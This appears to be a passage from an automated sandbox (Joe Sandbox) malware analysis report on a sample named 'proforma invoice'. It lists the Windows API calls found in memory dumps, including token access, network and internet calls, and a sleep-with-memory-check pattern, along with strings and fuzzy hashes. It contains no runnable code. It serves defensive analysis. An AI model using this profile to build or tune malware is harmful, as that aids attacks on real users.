                    • Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
                    • Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2
                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B38887
                  • LineTo.GDI32(?,?,?), ref: 00B38894
                  • EndPath.GDI32(?), ref: 00B388A4
                  • StrokePath.GDI32(?), ref: 00B388B2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                  • String ID:
                  • API String ID: 1539411459-0
                  • Opcode ID: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
                  • Instruction ID: 618a08b7f96d188843ed0cb4fed212e643049274d1f11a2dca1993f8878fbaf4
                  • Opcode Fuzzy Hash: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
                  • Instruction Fuzzy Hash: D5F03A36045698BADB125F98AC09FCE3F69AF06310F248040FB12760E2CB755552DBA5
                  APIs
                  • GetSysColor.USER32(00000008), ref: 00AB98CC
                  • SetTextColor.GDI32(?,?), ref: 00AB98D6
                  • SetBkMode.GDI32(?,00000001), ref: 00AB98E9
                  • GetStockObject.GDI32(00000005), ref: 00AB98F1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$ModeObjectStockText
                  • String ID:
                  • API String ID: 4037423528-0
                  • Opcode ID: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
                  • Instruction ID: a4d73356115d98faf36c557c4b6677229e9122babcbfdc2583161b6f0c5af825
                  • Opcode Fuzzy Hash: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
                  • Instruction Fuzzy Hash: 35E06531244644AADB215BB4AC09BED3F10AB11336F148219F7F5650E1C77146409B10
                  APIs
                  • GetCurrentThread.KERNEL32 ref: 00B01634
                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0163B
                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B011D9), ref: 00B01648
                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0164F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentOpenProcessThreadToken
                  • String ID:
                  • API String ID: 3974789173-0
                  • Opcode ID: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
                  • Instruction ID: 8f1b5bc116ccca74bf5f4f1c458487157694c60a8c38d60de56fbde9a0251a10
                  • Opcode Fuzzy Hash: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
                  • Instruction Fuzzy Hash: 54E08C32602211EBD7201FE4AE0DB8B3FBCEF44792F248848F245EA080EB348444CB68
                  APIs
                  • GetDesktopWindow.USER32 ref: 00AFD858
                  • GetDC.USER32(00000000), ref: 00AFD862
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
                  • ReleaseDC.USER32(?), ref: 00AFD8A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
                  • Instruction ID: 35e102deb06b1ea719f7306840f429b6aa64830a2f7a42ce7b1b2123659b4a7b
                  • Opcode Fuzzy Hash: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
                  • Instruction Fuzzy Hash: E8E0EEB1800204EFCB41AFE09909A6DBFB6AB08310F208009F846E7260CB388901AF40
                  APIs
                  • GetDesktopWindow.USER32 ref: 00AFD86C
                  • GetDC.USER32(00000000), ref: 00AFD876
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
                  • ReleaseDC.USER32(?), ref: 00AFD8A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
                  • Instruction ID: 31586898d86c9dbae025b7c04a42a57f6921b23b12c39d643440399137ff39ec
                  • Opcode Fuzzy Hash: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
                  • Instruction Fuzzy Hash: 7EE092B5800604EFCB51AFE0D94D66DBFB5BB08311F248449F94AF7260DB389905EF50
                  APIs
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B14ED4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Connection_wcslen
                  • String ID: *$LPT
                  • API String ID: 1725874428-3443410124
                  • Opcode ID: 3228bc173c5bddeae4e0f1019208534d9df189a5731620489bf2ea137cc57415
                  • Instruction ID: 503c3641bef2ef37bca95aa7d9dfa8728f68a7dd51ecd9d51e3d53541dc50393
                  • Opcode Fuzzy Hash: 3228bc173c5bddeae4e0f1019208534d9df189a5731620489bf2ea137cc57415
                  • Instruction Fuzzy Hash: 05914E75A002049FCB14DF58C584EAABBF5EF49304F5980D9E40A9F3A2D735EE86CB91
                  APIs
                  • __startOneArgErrorHandling.LIBCMT ref: 00ACE30D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorHandling__start
                  • String ID: pow
                  • API String ID: 3213639722-2276729525
                  • Opcode ID: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
                  • Instruction ID: 0951936a016ff3ccf52fb20f2fb460e6c6e25b35a06aeb124f0ed6375bbfb124
                  • Opcode Fuzzy Hash: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
                  • Instruction Fuzzy Hash: B6513A71A0C20296CB19F718CA42BBD3BA4AB40740F754D9EF0D7873A9FF358C959A46
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: #
                  • API String ID: 0-1885708031
                  • Opcode ID: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
                  • Instruction ID: 9a6222cd3d8cbfdeeee66695a2cdecff7aeae3941563a8362b014628a3fd1683
                  • Opcode Fuzzy Hash: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
                  • Instruction Fuzzy Hash: BC51353550428ADFDF15EFA8C0816FA7BB8EF26310F244065F9919B2E1DB349D42CBA0
                  APIs
                  • Sleep.KERNEL32(00000000), ref: 00ABF2A2
                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00ABF2BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: GlobalMemorySleepStatus
                  • String ID: @
                  • API String ID: 2783356886-2766056989
                  • Opcode ID: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
                  • Instruction ID: 7a44677deacfad1bf89c0fcebeefe454daa6035caae625874e02bcd1e6df3843
                  • Opcode Fuzzy Hash: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
                  • Instruction Fuzzy Hash: 355134714087449FE320AF14DD86BAFBBF8FB85710F81885DF199421A5EB708529CB66
                  APIs
                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00B257E0
                  • _wcslen.LIBCMT ref: 00B257EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BuffCharUpper_wcslen
                  • String ID: CALLARGARRAY
                  • API String ID: 157775604-1150593374
                  • Opcode ID: 5dd954884d2911d6cb1a1486c7a9955e44477bdc53a43a9b76628efda09a1043
                  • Instruction ID: 375bc85d92a00d12b43923cf3bc1a1b419d27738e0c5035382be02ab5b261ed6
                  • Opcode Fuzzy Hash: 5dd954884d2911d6cb1a1486c7a9955e44477bdc53a43a9b76628efda09a1043
                  • Instruction Fuzzy Hash: BB41B331E001199FCB14DFA8D9819FEBBF9FF59320F1040A9E509AB291EB749D81CB90
                  APIs
                  • _wcslen.LIBCMT ref: 00B1D130
                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B1D13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CrackInternet_wcslen
                  • String ID: |
                  • API String ID: 596671847-2343686810
                  • Opcode ID: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
                  • Instruction ID: d76ca67f1c17f29550907ca2a8947d009a8d6640d7fc0ac1fa8d1a0c6ecd2d96
                  • Opcode Fuzzy Hash: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
                  • Instruction Fuzzy Hash: ED312C72D00219ABCF15EFA4CD85AEEBFB9FF09340F500059F815B61A1DB35AA56CB50
                  APIs
                  • DestroyWindow.USER32(?,?,?,?), ref: 00B33621
                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B3365C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$DestroyMove
                  • String ID: static
                  • API String ID: 2139405536-2160076837
                  • Opcode ID: 0540b6f336a5d2b6c5e60a5a5e3f68740c15bbc30a0a1e8d0af7eb49ad85786b
                  • Instruction ID: bf73af9397943c3af09fedb5a8c14771149a7f2ea8737ac7b016bdefaab204ea
                  • Opcode Fuzzy Hash: 0540b6f336a5d2b6c5e60a5a5e3f68740c15bbc30a0a1e8d0af7eb49ad85786b
                  • Instruction Fuzzy Hash: 93319E71110604AEDB109F68DC81EFB73E9FF98B20F219619F8A5D7290DB30AD91C760
                  APIs
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B3461F
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B34634
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: '
                  • API String ID: 3850602802-1997036262
                  • Opcode ID: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
                  • Instruction ID: b44a47e0b78a1ccd07b497d0e4871f2626c4ffdcd7f151c0d10d7dba36af7889
                  • Opcode Fuzzy Hash: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
                  • Instruction Fuzzy Hash: 84312574A0020A9FDF14CFA9C981BDABBF5FF19300F2144AAE904AB381D770A941CF90
                  APIs
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B3327C
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B33287
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: Combobox
                  • API String ID: 3850602802-2096851135
                  • Opcode ID: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
                  • Instruction ID: ae116f3da42401ae605f9b6bf53252b0191ca3605b672505cbd35c291d707bdc
                  • Opcode Fuzzy Hash: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
                  • Instruction Fuzzy Hash: 7B11C8713002087FFF219F54DC81EBB37EAEB54764F204264F51897290D671DD518760
                  APIs
                    • Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                    • Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
                    • Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                  • GetWindowRect.USER32(00000000,?), ref: 00B3377A
                  • GetSysColor.USER32(00000012), ref: 00B33794
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                  • String ID: static
                  • API String ID: 1983116058-2160076837
                  • Opcode ID: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
                  • Instruction ID: 2ae8dc0e7bb6453815c0d6eb7027c02bac08b637a7eb02813ee0fe598d4e764b
                  • Opcode Fuzzy Hash: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
                  • Instruction Fuzzy Hash: 9F1126B2610209AFDF00DFA8CC46EEA7BF8EB08714F114954F955E3250EB39E8619B60
                  APIs
                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B1CD7D
                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B1CDA6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Internet$OpenOption
                  • String ID: <local>
                  • API String ID: 942729171-4266983199
                  • Opcode ID: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
                  • Instruction ID: d8f6ebe54d571403eb9c7e6ee8aefe5f77eb39008ecb18bf861fe9e18336c103
                  • Opcode Fuzzy Hash: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
                  • Instruction Fuzzy Hash: E2110671281631BAD7344B669C84EE7BEECEF127A4F9042B6B11993090D7709980D6F0
                  APIs
                  • GetWindowTextLengthW.USER32(00000000), ref: 00B334AB
                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B334BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LengthMessageSendTextWindow
                  • String ID: edit
                  • API String ID: 2978978980-2167791130
                  • Opcode ID: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
                  • Instruction ID: 3e4d8b5bf286bb0f17690089dcbacb80bbb67416f0c9995b220b520e5bf307a9
                  • Opcode Fuzzy Hash: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
                  • Instruction Fuzzy Hash: 6F118F71100208ABEB124F64DC85AAB3BEAEB15B74F604764F965A72E0C771DC919B60
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • CharUpperBuffW.USER32(?,?,?), ref: 00B06CB6
                  • _wcslen.LIBCMT ref: 00B06CC2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: STOP
                  • API String ID: 1256254125-2411985666
                  • Opcode ID: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
                  • Instruction ID: f4ecf05cea2b1c3766c23eab6a0d7470449604d4b8f27bbf92dcf7b736d7d2cf
                  • Opcode Fuzzy Hash: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
                  • Instruction Fuzzy Hash: FF01C032A0052A8BEB21AFBDDD819BF7BE5EA65710B100679E862971D0EB31D960C650
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B01D4C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
                  • Instruction ID: e5ef1873a167699f0ca0865b3e132cd28558856ffcfcc16ce396a3bf8dd1b544
                  • Opcode Fuzzy Hash: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
